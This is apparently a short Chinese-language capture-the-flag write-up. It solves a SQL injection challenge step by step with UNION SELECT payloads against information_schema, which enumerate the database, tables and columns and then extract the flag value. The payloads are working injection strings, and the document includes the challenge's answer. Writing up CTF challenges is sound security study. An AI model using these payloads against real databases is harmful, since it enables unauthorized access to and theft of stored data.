根据搜索条件,考虑题目为sql注入
1. 输入语句’ and 0 union select 1,2,3 from information_schema.tables#,查看数据库返回列数
查询结果说明,数据库返回的列数为3
2.查询数据库名称
’ and 0 union select 1,2,table_schema from information_schema.tables#,查询结果可知,数据库名称为 news
3. 查询news数据库中的表:
’ and 0 union select 1,2,table_name from information_schema.tables where table_schema=‘news’#
发现secret_table
4.查询表中列名:
’ and 0 union select 1,2,column_name from information_schema.columns where table_schema=‘news’ and table_name=‘secret_table’#
发现关键字fl4g
5.查询fl4g
’ and 0 union select 1,2,fl4g from secret_table#
得到结果:QCTF{sq1_inJec7ion_ezzz}